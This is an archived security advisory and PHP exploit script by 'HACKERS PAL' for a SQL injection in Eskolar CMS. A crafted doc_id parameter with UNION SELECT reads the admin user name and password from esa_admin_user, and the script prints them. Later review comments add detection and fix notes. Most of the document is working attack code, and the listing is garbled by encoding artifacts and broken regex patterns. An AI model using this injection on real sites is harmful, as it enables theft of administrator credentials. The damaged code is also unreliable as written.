


Eskolar CMS Remote Sql Injection






Hello,

Eskolar CMS Remote SQL Injection

Discovered by: HACKERS PAL
Copyright: HACKERS PAL
Website: http://www.soqor.net
Email address: security@soqor.net

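Remote SQL injection (the doc_id parameter of /index.php accepts an appended UNION SELECT, which returns the user and password columns of the esa_admin_user table):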
/index.php?gr_1_id=0&gr_2_id=0&gr_3_id=1&doc_id=10%20union%20select%201,2,3,4,5,6,7,8,password,10,11,12,13,14,15,16,user,18,19,20,21,22,23,24,25,26%20FROM%20esa_admin_user/*=0D
=0D
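Exploit (PHP; the opening tag and comment marker of the listing, and parts of its regular expressions, appear to have been lost when the page was archived, and every line carries a stray "=0D" from quoted-printable encoding):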
#!/usr/bin/php -q -d short_open_tag=on=0D
WwW.SoQoR.NeT=0D 
*/=0D
// Prints the author banner.
// NOTE(review): every line of this listing ends in =0D, which is a
// quoted-printable carriage return left over from the mail archive and is
// not part of the PHP source.
print_r('=0D
/**********************************************/=0D
/* Eskolar CMS Remote sql injection exploit   */=0D
/* by HACKERS PAL  */=0D 
/* site: http://www.soqor.net */');=0D 
// Fewer than two argv entries means no target base URL was supplied:
// print the usage text and stop.
if ($argc<2) {=0D
print_r('=0D
/* --                                         */=0D
/* Usage: php '.$argv[0].' host=0D
/* Example:                                   */=0D
/* php '.$argv[0].' http://localhost/eskolar/=0D 
/**********************************************/=0D
');=0D
die;=0D
}=0D
// Suppresses all PHP error output, removes the execution time limit and
// sets the default socket timeout to 5 seconds. With errors hidden, a failed
// fetch later in the script produces no diagnostic.
error_reporting(0);=0D
ini_set("max_execution_time",0);=0D
ini_set("default_socket_timeout",5);=0D
=0D
// The base URL is taken from the first command-line argument unchanged.
$url=$argv[1];=0D
// Request path used by the advisory: doc_id carries a UNION SELECT with 26
// columns, with password in column 9 and user in column 17, read from
// esa_admin_user. The trailing comment-open marker presumably discards the
// rest of the original query (the vulnerable query is not shown on this page).
// Defender view: a doc_id value containing union select and esa_admin_user
// in web access logs is an indicator of this attempt. The application-side
// fix is to cast doc_id to an integer or bind it as a query parameter.
$exploit="/index.php?gr_1_id=0&gr_2_id=0&gr_3_id=1&doc_id=10%20union%20select%201,2,3,4,5,6,7,8,password,10,11,12,13,14,15,16,user,18,19,20,21,22,23,24,25,26%20FROM%20esa_admin_user/*";=0D
// Full request URL is plain concatenation of base URL and path.
$page=$url.$exploit;=0D
         // Fetches $url with a plain GET and returns the response body.
         // Uses file_get_contents() when that function exists, otherwise
         // falls back to fopen() and fread() in 1024-byte reads.
         // NOTE(review): no failure handling is visible. The fopen() result is
         // not checked, the handle is never closed, and $contents is not
         // initialised before the first concatenation in the fallback branch.
         // On a failed fetch the return value is false or unset, and the
         // error_reporting(0) call earlier in the script hides the warning.
         Function get_page($url)=0D
         {=0D
=0D
                  if(function_exists("file_get_contents"))=0D
                  {=0D
=0D
                       $contents = file_get_contents($url);=0D
=0D
                          }=0D
                          else=0D
                          {=0D
                              $fp=fopen("$url","r");=0D
                              while($line=fread($fp,1024))=0D
                              {=0D
                               $contents=$contents.$line;=0D
                              }=0D
=0D
=0D
                                  }=0D
                       return $contents;=0D
         }=0D
         // Global call counter read and updated by get() below.
         $i=0;=0D
=0D
         // Callback passed to preg_replace_callback() later in the script.
         // $var is the match array; $var[1] is the first capture group,
         // trimmed before printing.
         // The first call (while $i is 0) prints the value labelled User Name
         // and increments $i; every later call prints it labelled Pass Word.
         // Nothing is returned, and the callers discard the replacement
         // result, so the function is used only for its output.
         function get($var)=0D
         {=0D
          GLOBAL $i;=0D
           $var[1]=trim($var[1]);=0D
          if($i==0)=0D
          {=0D
          Echo "\n[+] User Name : ".$var[1];=0D
         $i++;=0D
          }=0D
          else=0D
          {=0D
          Echo "\n[+] Pass Word : ".$var[1];=0D
                  }=0D
=0D
=0D
         }=0D
=0D
     // Fetches the crafted URL; $page is overwritten with the response body.
     $page = get_page($page);=0D
=0D
     // Both patterns must match the response or the script reports failure;
     // otherwise get() is run over each pattern to print the captured values.
     // NOTE(review): the two patterns were damaged when this page was
     // archived (markup inside them was stripped and several lines were
     // joined), so they are not valid as shown and are left as found.
     // Defender view: the values printed are the admin user name and the
     // stored password value from esa_admin_user, so a site that ran the
     // affected version should treat those credentials as exposed and
     // rotate them.
     if(!preg_match('/\
(.+?)<\/div><\/td><\/tr>/is',$page)||!preg_match('/\(.+?)<\/a> <\/td>/is',$page))=0D {=0D Die("\n[-] Exploit Failed\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");=0D }=0D =0D preg_replace_callback('/\
(.+?)<\/div><\/td><\/tr>/is','get',$page);=0D =0D preg_replace_callback('/\(.+?)<\/a> <\/td>/is','get',$page);=0D =0D Die("\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");=0D ?>=0D #WwW.SoQoR.NeT

